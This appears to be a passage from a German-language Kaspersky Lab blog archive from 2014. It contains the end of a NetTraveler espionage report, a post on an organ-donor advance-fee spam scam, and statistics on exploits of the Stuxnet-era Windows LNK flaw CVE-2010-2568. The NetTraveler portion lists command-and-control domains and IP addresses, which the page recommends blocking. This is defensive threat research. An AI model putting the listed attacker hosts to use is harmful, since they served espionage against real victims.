Hong Kong, Sun Network (hong Kong) LimitedSHANGHAI MEICHENG TECHNOLOGY
angellost.netwas 103.17.117.201hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY
husden.comwas 103.30.7.76hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY

Wir empfehlen, alle diese Hosts in der Firewall zu blockieren.

Fazit

In diesem Jahr begehen die Cyberkriminellen, die hinter NetTraveler stehen, ihr 10jähriges „Dienst-Jubiläum“. Obgleich es so aussieht, als wären die frühsten Samples, die uns bekannt sind, im Jahr 2005 kompiliert, gibt es untrügliche Anzeichen dafür, dass die Aktivität der NetTraveler-Verbrecher bereits im Jahr 2004 ihren Anfang nahm.

nettraveler_5

Zehn Jahre lang hat NetTraveler verschiedene Sektoren angegriffen, wobei der Fokus auf Zielen in den Bereichen Diplomatie, Regierung und Militär lag.

nettraveler_6

NetTraveler-Opfer nach Branchen

In letzter Zeit dreht sich das Hauptinteresse der Cyberspionage-Aktivtät um Weltraumforschung, Nano-Technologie, Energieproduktion, Nuklearenergie, Laser, Medizin und Kommunikation.

Die Angriffe auf uigurische und tibetische Aktivisten sind eine Standardkomponente der NetTraveler-Aktivität, und wir gehen davon aus, dass sich das auch in den kommenden 10 Jahren nicht ändern wird.

Organspende mit Lieferung frei Haus


  Tatyana Kulikova        6 August 2014 | 16:03  MSK

Ihr Kommentar  

Ein Liebesversprechen im Tausch gegen die Bezahlung der Reisekosten zum Wohnort des potentiellen Bräutigams ist ein weit verbreiteter Ansatz im betrügerischen Spam. Wesentlich seltenen trifft man in unerwünschten Mitteilungen auf „wohltätige“ Hilfsangebote, die sich dann aber als nicht wirklich kostenlos erweisen.


Ein gewisser Bewohner Odessas namens Alex erklärte in einer Mail, sich gegen eine nicht geringe Entlohnung als Organspender zu verdingen. In dem Schreiben informierte er den Empfänger über seinen Gesundheitszustand („nicht perfekt, aber sehr gut“), seine biometrischen Daten (Größe – 1,74 m, Gewicht – 63 kg) und sogar über seine Blutgruppe. Die Summe, für die der Mann aus Odessa bereit ist, eine Niere oder einen Teil seiner Leber herzugeben, wurde nicht genannt, aber die Hauptbedingung für die Organspende war, dass die Operation in einer europäischen Klinik durchgeführt würde.

Es ist komplett vorhersehbar, dass von Leuten, die auf diese Mitteilung reagieren und sich dazu entschließen, das überaus interessante Angebot anzunehmen, verlangt wird, dem potentiellen Spender eine nicht geringe Geldsumme vorzustrecken. Höchstwahrscheinlich wird der „Odessaner“ um einen Vorschuss auf die Reisekosten nach Europa bitten oder um Geld für die Durchführung zusätzlicher Analysen in qualifizierten Labors, und nach der Überweisung wird er zusammen mit dem erhaltenen Kapital verschwinden. Ehrlichkeit und Geschäfte, die aufgrund von Spam zustande kommen, sind zwei unvereinbare Dinge. Und man sollte erst recht überhaupt gar kein Risiko eingehen, indem man mit Betrügern in Verhandlungen tritt, wenn es dabei um die eigene Gesundheit oder das eigene Leben geht.


Das Stuxnet-Echo: Unerwartete Untersuchungsergebnisse zu Angriffen mit Hilfe von Exploits zu Microsoft-Produkten


   5 August 2014 | 14:00  MSK

Ihr Kommentar  

Wir bei Kaspersky Lab führen regelmäßig Untersuchungen zu einem konkreten Typ von Cyberbedrohungen durch. Zu Beginn dieses Jahres untersuchten wir eingehend die finanziellen Cyberbedrohungen, und Ende letzten Jahres analysierten wir vor dem Hintergrund des Auftauchens immer wieder neuer Sicherheitslücken in Java die Landschaft der Attacken auf die Anwender unserer Produkte, in denen Exploits zu Sicherheitslücken in der populären Software des Unternehmens Oracle zum Einsatz kamen.

In diesem Sommer haben wir einen Artikel mit dem Titel „Windows: Popularität und Sicherheitslücken“ vorbereitet, in dem wir herauszufinden versuchten, ob der Anteil der Anwender, die veraltete Windows-Versionen verwenden, groß ist oder nicht, und wie häufig die Nutzer mit Exploits unter Windows und anderen Microsoft-Produkten konfrontiert werden. Einige dieser Untersuchungsergebnisse erwiesen sich als völlig unerwartet.

Im Sommer 2010 ging die Kunde von der Existenz von Stuxnet um die Welt - einem Computerwurm, der - wie sich später herausstellte – eigens entwickelt wurde, um den Prozess der Urananreicherung in einigen Betrieben im Iran zu sabotieren. Stuxnet wurde zu einer wahren Bombe, die demonstrierte, was Malware in der Lage ist anzurichten, wenn ihr Ziel eng eingegrenzt ist und sie sorgfältig vorbereitet wird. Für die Verbreitung des Wurms wurde ein Exploit zu der Sicherheitslücke CVE-2010-2568 verwendet. Bei dieser Sicherheitslücke handelt es sich um einen Fehler in der Verarbeitung von Shortcuts im Betriebssystem Windows, der es ermöglicht, willkürliche dynamische Bibliotheken ohne Wissen des Anwenders zu laden. Die Schwachstelle betraf Windows XP, Vista, 7, sowie Windows Server 2003 und 2008.

Die ersten Schadprogramme, die diese Sicherheitslücke ausnutzten, wurden im Juli 2010 entdeckt. Unter anderem benutzte der Wurm Sality sie zur Verbreitung des eigenen Codes: Der Wurm generiert verwundbare Shortcuts und verbreitet sie innerhalb des lokalen Netzes. Der User muss nur einen Ordner öffnen, der einen solchen Shortcut enthält, und schon wird das bösartige Programm gestartet. Nach Sality und Stuxnet nutzten auch die bekannten Spionage-Programme Flame und Gauss diese Sicherheitslücke aus.

Microsoft gab ein Sicherheits-Update heraus, das die Schwachstelle noch im Herbst 2010 beseitigte. Ungeachtet dessen registrieren die Detektionssysteme von Kaspersky Lab bis zum heutigen Tag Dutzende Millionen Alarme aufgrund von Exploits, die die Sicherheitslücke CVE-2010-2568 ausnutzen. Tatsächlich wurden innerhalb des Untersuchungszeitraums 50 Millionen Alarme auf über 19 Millionen Computern weltweit registriert.

Überaus aussagekräftig ist auch die Verteilung der Betriebssysteme, auf denen die Alarme auf Exploits zu der LNK-Sicherheitslücke registriert wurden. Der Löwenanteil der Alarme (64,19%) entfiel in den letzten acht Monaten auf XP und nur 27,99% auf Windows 7. Die Produkte von Kaspersky Lab, die die Server-Betriebssysteme Windows Server 2003 und 2008 schützen, melden ebenfalls regelmäßig Detektionen von derartigen Exploits, und zwar 1,58% und 3,99% der Alarme respektive. Die große Zahl von Alarmen, die auf die Nutzer von XP entfallen, zeugt davon, dass auf den meisten dieser Computer entweder keine Schutzlösung installiert ist oder dass eine verwundbare Windows-Version verwendet wird – oder dass beides zutrifft. Die Alarme von den Server-Systemen sind ein Beleg für das Vorhandensein schädlicher Shortcuts in Netzverzeichnissen mit öffentlichem Zugriff, die die Sicherheitslücke CVE-2010-2568 ausnutzen.

Interessant ist auch die geografische Verteilung aller registrierten Alarme aufgrund der Sicherheitslücke CVE-2010-2568.


Geografische Verteilung der Alarme der Produkte von Kaspersky Lab auf Exploits für die Sicherheitslücke CVE-2010-2568 von November 2013 bis Juni 2014

Wie man sieht, sind Vietnam (42,45%), Indien (11,7%) und Algerien (5,52%) nicht nur führend, wenn es um den Nutzungsanteil des veralteten Betriebssystems XP geht, sondern sie liegen auch auf den ersten Plätzen nach Anzahl der Alarme der Schutzprodukte von Kaspersky Lab auf eine der gefährlichsten Sicherheitslücken in Windows, die zum gegenwärtigen Zeitpunkt bekannt ist. Bemerkenswert ist auch, dass den Daten derselben Untersuchung zufolge eben diese drei Länder nach Anteil der Nutzer des veralteten Betriebssystems Windows XP ebenfalls an der Spitze stehen.

Vietnam38.79%
China 27.35%
Indien 26.88%
Algerien24.25%
Italien20.31%
Spanien19.26%
Russische Föderation17.40%
Frankreich 12.04%
Deutschland8.54%
USA4.52%

TOP 10 der Länder mit dem größten Anteil an Anwendern von Windows XP an allen Windows-Anwendern

Es ist kein Wunder, dass die Attacken, die die Sicherheitslücke CVE-2010-2568 ausnutzen, bis heute so verbreitet sind. Die Tatsache, dass so viele Nutzer noch immer verwundbare Systeme verwenden, trägt dazu bei, dass die Exploits zu dieser Sicherheitslücke nach wie vor effektiv sind – und zwar selbst vier Jahre, nachdem ein Patch veröffentlicht wurde, das diese Schwachstelle beseitigt.

Alle weiteren Untersuchungsergebnisse und die vollständige Version des Berichts „Windows: Popularität und Sicherheitslücken“ finden Sie hier.

Nach oben  |  Archiv >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen